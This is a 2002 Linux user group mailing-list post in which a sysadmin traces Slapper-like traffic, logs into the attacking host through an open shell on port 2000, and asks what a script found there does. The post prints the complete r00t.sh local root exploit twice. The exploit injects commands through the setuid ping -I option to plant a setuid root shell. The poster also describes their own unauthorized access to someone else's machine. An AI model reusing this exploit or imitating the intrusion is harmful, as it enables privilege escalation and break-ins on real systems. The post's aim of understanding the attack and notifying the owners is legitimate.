[lug] script kiddie
jdavis
lug at taproot.bz
Sat Nov 30 02:56:34 MST 2002
hello,
While reviewing last nights Snort logs I noticed alot of ssl - slapper
like activity from one box to my webserver. The box looked to be
in tyland, so i decided to have a look. a nmap scan of the box in tyland
showed nothing intresting except that port 2000 was open. so telnetd
to it and got a shell with apache uid. The shell droped me in / so
I looked in /tmp to see if any slapper files were there...i didnt see
any but there was lots of other stuff.
h-2.05$ ls -la
ls -la
total 7208
drwxr-xr-x 2 apache apache 4096 Dec 1 19:36
drwxr-xr-x 3 apache apache 4096 Nov 23 10:57
drwxrwxrwt 20 root root 4096 Dec 1 21:17 .
drwxr-xr-x 22 root root 4096 Nov 13 08:53 ..
drwxr-xr-x 3 apache apache 4096 Nov 15 12:18 ..
drwxr-xr-x 7 apache apache 4096 Dec 1 19:21 ...
drwxrwxrwt 3 root root 4096 Nov 29 09:59 .ICE-unix
-rw------- 1 apache apache 7248 Dec 1 19:41 .bash_history
srw------- 1 root nobody 0 Jun 27 23:11 .famSDVA9b
srwx------ 1 root nobody 0 Jul 9 09:10 .fam_socket
srw------- 1 root nobody 0 Jun 26 18:54 .famsJkAwq
drwxrwxrwt 2 xfs xfs 4096 Nov 13 08:53 .font-unix
drwxr-xr-x 2 apache apache 4096 Nov 18 20:33 .fontunix
-rw------- 1 apache apache 12288 Nov 29 22:32 .psybnc.pid.swp
-rw-r--r-- 1 apache apache 0 Nov 23 10:58
982235016-gtkrc-429249277
-rw-r--r-- 1 apache apache 20266 Apr 14 2001 CHANGES
-rw------- 1 apache apache 17982 Mar 26 2001 COPYING
-rw-r--r-- 1 apache apache 2660 Mar 26 2001 FAQ
-rw-r--r-- 1 apache apache 1347 Apr 15 2001 Makefile
-rw-r--r-- 1 apache apache 36672 Apr 14 2001 README
-rw-r--r-- 1 apache apache 76 Mar 24 2001 TODO
-rw------- 1 apache apache 4394 Nov 28 16:21 USER1.LOG
-rw------- 1 apache apache 1275 Nov 28 04:20 USER2.LOG
-rwxr-xr-x 1 apache apache 620708 Feb 17 2002 bash
-rw-r--r-- 1 apache apache 616831 May 29 2002 bnc.tar.gz
drwxr-xr-x 6 apache apache 4096 Dec 1 01:00 com
-rw-r--r-- 1 apache apache 958690 Nov 24 22:26 com.tgz
-rw-r--r-- 1 apache apache 958690 Nov 30 20:12 com.tgz.1
-rw------- 1 apache apache 783 Aug 6 2000 config.h
drwxr-xr-x 2 apache apache 4096 Mar 23 2001 help
drwxr-xr-x 2 apache apache 4096 Dec 1 20:53 log
-rw-r--r-- 1 apache apache 717 Feb 17 2002 makefile.out
-rwxr-xr-x 1 apache apache 6056 Feb 17 2002 makesalt
-rw-r--r-- 1 apache apache 56981 Dec 1 00:43 massopen
-rw-r--r-- 1 apache apache 1937771 Oct 21 00:40 massopen.tgz
-rw-r--r-- 1 apache apache 1937771 Oct 21 00:40 massopen.tgz.1
drwxr-xr-x 3 apache apache 4096 Jul 31 2000 menuconf
drwxr-xr-x 2 apache apache 4096 Dec 1 21:28 motd
drwx------ 2 root root 4096 Jul 9 09:13 orbit-root
-rw------- 1 apache apache 1262 Nov 28 02:55 psybnc.conf
-rw------- 1 apache apache 1262 Nov 28 02:54 psybnc.conf.old
-rw------- 1 apache apache 6 Dec 1 20:39 psybnc.pid
-rwxr-xr-x 1 apache apache 369 Aug 9 2000 psybncchk
-rwxr-xr-x 1 apache apache 2311 Nov 26 23:10 r00t.sh
drwxr-xr-x 3 apache apache 4096 Nov 27 00:04 sawfish-root
drwxr-xr-x 3 apache apache 4096 Jul 31 2000 scripts
-rw------- 1 root root 0 Nov 13 08:53 session_mm.sem
drwxr-xr-x 2 apache apache 4096 Feb 17 2002 src
-rw------- 1 apache apache 3756 Sep 15 2000 targets.mak
drwxr-xr-x 2 apache apache 4096 Feb 17 2002 tools
drwxr-xr-x 2 apache apache 4096 Nov 30 23:51 za
so psybnc is a irc redirector and I know what a salt is but the rest of
whats happening is news to me. Here is the r00t.sh script...
sh-2.05$ cat r0
cat r00t.sh
#!/bin/sh
echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer
<krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo
PING=/bin/ping6
test -u $PING || PING=/bin/ping
if [ ! -u $PING ]; then
echo "Scuze, nu exista setuid pentru ping"
exit 0
fi
echo "Faza 1: facem lumea in care se poate scrie a / "
$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null
sleep 1
echo "Faza 2: compilam aplicatia helperului in /..."
cat >/x.c <<_eof_
main() {
setuid(0); seteuid(0);
system("chmod 755 /;rm -f /x; rm -f /x.c");
execl("/bin/bash","bash","-i",0);
}
_eof_
gcc /x.c -o /x
chmod 755 /x
echo "Faza 3: chown+chmod in aplicatia helperului nostru..."
$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1
if [ ! -u /x ]; then
echo "Aparent nu-l pot r00ta :("
exit 1
fi
echo "Hopa .. uite ca esti r00t :)"
/x
echo "Mersi"
# Nu Mai Floodati ! =-> [www.undernet.org]##!/bin/sh
echo
echo "AcEsTa EsTe Un 3xPl0it p3ntRu Red Hat 7.0"
echo "(c) lastDevil lastDevil at millennium.ro "
echo "El A Descoperit Bug-ul =-> Sebastian Krahmer
<krahmer at cs.uni-potsdam.de>"
echo
echo "Nu Incercati Sa Rootati RedHat Mai Mici Decat 7.0 Deoarece"
echo "Este Un Bug Gasit De Curand"
echo
echo "Ok. Now Let's Kick Ass:)"
echo
echo
PING=/bin/ping6
test -u $PING || PING=/bin/ping
if [ ! -u $PING ]; then
echo "Scuze, nu exista setuid pentru ping"
exit 0
fi
echo "Faza 1: facem lumea in care se poate scrie a / "
$PING -I ';chmod o+w .' 195.117.3.59 &>/dev/null
sleep 1
echo "Faza 2: compilam aplicatia helperului in /..."
cat >/x.c <<_eof_
main() {
setuid(0); seteuid(0);
system("chmod 755 /;rm -f /x; rm -f /x.c");
execl("/bin/bash","bash","-i",0);
}
_eof_
gcc /x.c -o /x
chmod 755 /x
echo "Faza 3: chown+chmod in aplicatia helperului nostru..."
$PING -I ';chown 0 x' 195.117.3.59 &>/dev/null
sleep 1
$PING -I ';chmod +s x' 195.117.3.59 &>/dev/null
sleep 1
if [ ! -u /x ]; then
echo "Aparent nu-l pot r00ta :("
exit 1
fi
echo "Hopa .. uite ca esti r00t :)"
/x
echo "Mersi"
# Nu Mai Floodati ! =-> [www.undernet.org]#
i looked at 195.117.3.59 a little and got this result...
sh-2.05$ telnet 195.117.3.59 987
telnet 195.117.3.59 987
Trying 195.117.3.59...
Connected to 195.117.3.59.
Escape character is '^]'.
#KM-v0.1b+
upt: 3303336.38 2861753.33
lav: 1.41 1.33 1.17 2/315 3994
mem: 131047424 128679936 2367488 80031744 1622016 20074496
tim: 14:17:24
dat: 2002-12-01
cpu: 13925461 2968956 27263889 286175333
dsk: 24853630 13005890 1223992 0
pid: 3994
fls: 1200
ino: 3968 3064
sockets: used 281
TCP: inuse 200 highest 473
UDP: inuse 20 highest 48
RAW: inuse 1 highest 3
PAC: inuse 0 highest 1
SYN_COOKIES: count 98 since_last_check 0
Connection closed by foreign host.
can anyone tell me what r00t.sh does? And how would one go about
notifing the owners.
jd
jd at taproot.bz
http://www.taproot.bz
More information about the LUG
mailing list